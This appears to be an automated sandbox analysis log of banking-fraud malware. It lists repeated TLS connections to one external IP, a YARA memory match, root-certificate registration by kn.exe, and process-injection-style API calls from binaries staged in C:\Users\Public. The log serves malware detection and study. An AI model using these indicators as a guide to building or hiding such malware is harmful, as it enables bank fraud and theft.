      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49891 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49903 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49910 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49918 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49929 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49936 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49945 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49954 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49962 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49973 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49980 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49989 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50006 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50017 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50024 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50032 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50043 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50062 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50069 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50080 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50080 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50088 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50096 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50107 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50114 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50126 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50133 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50145 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50153 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50160 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50162 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50164 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50166 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50168 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50170 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50172 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50174 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50176 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50178 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50180 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50182 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50184 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50186 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50188 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50190 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50192 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50194 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50196 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50198 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50200 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50202 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50204 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50206 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50208 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50210 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50212 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50214 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50216 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50218 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.4:50220 version: TLS 1.2
      Source: Yara matchFile source: Process Memory Space: Host.COM PID: 7652, type: MEMORYSTR

      E-Banking Fraud

      barindex
      Registers a new ROOT certificate
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EB684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,6_2_00007FF7E07EB684
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF7E082E1F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF7E07F25E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E086A740
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF7E07F29A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF7E081EA7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866EA8 NCryptImportKey,#360,6_2_00007FF7E0866EA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF7E0830EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF7E0820F58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E08693A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E083342C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08698B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E08698B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF7E082184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF7E07BF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF7E07CFC20
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,3_2_00007FF7937588C0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,3_2_00007FF79376BCF0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,3_2_00007FF793758114
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,3_2_00007FF793757FF8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,3_2_00007FF7937589E4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,3_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79375898C NtQueryInformationToken,3_2_00007FF79375898C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,3_2_00007FF793743D94
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,5_2_00007FF7937588C0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,5_2_00007FF79376BCF0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,5_2_00007FF793758114
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,5_2_00007FF793757FF8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,5_2_00007FF7937589E4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,5_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79375898C NtQueryInformationToken,5_2_00007FF79375898C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,5_2_00007FF793743D94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E088C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,6_2_00007FF7E088C964
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E07D80 NtWriteVirtualMemory,9_2_02E07D80
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0DD6C RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,9_2_02E0DD6C
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0DBAC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02E0DBAC
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0DC88 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,9_2_02E0DC88
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0DC00 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,9_2_02E0DC00
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08D6A GetThreadContext,SetThreadContext,NtResumeThread,9_2_02E08D6A
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08D6C GetThreadContext,SetThreadContext,NtResumeThread,9_2_02E08D6C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF793758114
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF793757FF8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF7937588C0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF79376BCF0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF7937589E4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375898C NtQueryInformationToken,10_2_00007FF79375898C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF793743D94
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793758114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF793758114
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793757FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF793757FF8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937588C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF7937588C0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF79376BCF0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937589E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7937589E4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793771538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375898C NtQueryInformationToken,11_2_00007FF79375898C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793743D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF793743D94
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793745240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,3_2_00007FF793745240
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793754224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,3_2_00007FF793754224
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937537D83_2_00007FF7937537D8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937542243_2_00007FF793754224
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79374AA543_2_00007FF79374AA54
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793750A6C3_2_00007FF793750A6C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937555543_2_00007FF793755554
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937518D43_2_00007FF7937518D4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79374B0D83_2_00007FF79374B0D8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937485103_2_00007FF793748510
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793742C483_2_00007FF793742C48
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79376AC4C3_2_00007FF79376AC4C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937578543_2_00007FF793757854
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937418843_2_00007FF793741884
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79376AFBC3_2_00007FF79376AFBC
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793746BE03_2_00007FF793746BE0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937434103_2_00007FF793743410
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79374372C3_2_00007FF79374372C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793749B503_2_00007FF793749B50
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793745B703_2_00007FF793745B70
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793743F903_2_00007FF793743F90
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793746EE43_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793767F003_2_00007FF793767F00
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937422203_2_00007FF793742220
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793744A303_2_00007FF793744A30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79376AA303_2_00007FF79376AA30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937452403_2_00007FF793745240
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937476503_2_00007FF793747650
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79374D2503_2_00007FF79374D250
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793749E503_2_00007FF793749E50
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79374E6803_2_00007FF79374E680
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79376EE883_2_00007FF79376EE88
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937481D43_2_00007FF7937481D4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79376D9D03_2_00007FF79376D9D0
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793748DF83_2_00007FF793748DF8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79374CE103_2_00007FF79374CE10
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793747D303_2_00007FF793747D30
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937715383_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937537D85_2_00007FF7937537D8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937542245_2_00007FF793754224
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79374AA545_2_00007FF79374AA54
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793750A6C5_2_00007FF793750A6C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937555545_2_00007FF793755554
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937518D45_2_00007FF7937518D4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79374B0D85_2_00007FF79374B0D8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937485105_2_00007FF793748510
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793742C485_2_00007FF793742C48
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79376AC4C5_2_00007FF79376AC4C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937578545_2_00007FF793757854
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937418845_2_00007FF793741884
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79376AFBC5_2_00007FF79376AFBC
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793746BE05_2_00007FF793746BE0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937434105_2_00007FF793743410
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79374372C5_2_00007FF79374372C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793749B505_2_00007FF793749B50
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793745B705_2_00007FF793745B70
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793743F905_2_00007FF793743F90
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793746EE45_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793767F005_2_00007FF793767F00
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937422205_2_00007FF793742220
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793744A305_2_00007FF793744A30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79376AA305_2_00007FF79376AA30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937452405_2_00007FF793745240
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937476505_2_00007FF793747650
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79374D2505_2_00007FF79374D250
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793749E505_2_00007FF793749E50
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79374E6805_2_00007FF79374E680
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79376EE885_2_00007FF79376EE88
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937481D45_2_00007FF7937481D4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79376D9D05_2_00007FF79376D9D0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793748DF85_2_00007FF793748DF8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79374CE105_2_00007FF79374CE10
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793747D305_2_00007FF793747D30
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937715385_2_00007FF793771538
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087C1206_2_00007FF7E087C120
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087CCB86_2_00007FF7E087CCB8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A2F386_2_00007FF7E07A2F38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087F0206_2_00007FF7E087F020
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08A38006_2_00007FF7E08A3800
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087BC106_2_00007FF7E087BC10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EC1D06_2_00007FF7E07EC1D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081A1E86_2_00007FF7E081A1E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08A41F86_2_00007FF7E08A41F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B01406_2_00007FF7E07B0140
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07981706_2_00007FF7E0798170
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EE29C6_2_00007FF7E07EE29C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085821C6_2_00007FF7E085821C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08742746_2_00007FF7E0874274
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08062806_2_00007FF7E0806280
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B227C6_2_00007FF7E07B227C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07DE3A06_2_00007FF7E07DE3A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F03986_2_00007FF7E07F0398
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08243D06_2_00007FF7E08243D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08184146_2_00007FF7E0818414
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B44106_2_00007FF7E07B4410
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087234C6_2_00007FF7E087234C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08263746_2_00007FF7E0826374
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D64A86_2_00007FF7E07D64A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08024D46_2_00007FF7E08024D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A44E06_2_00007FF7E07A44E0
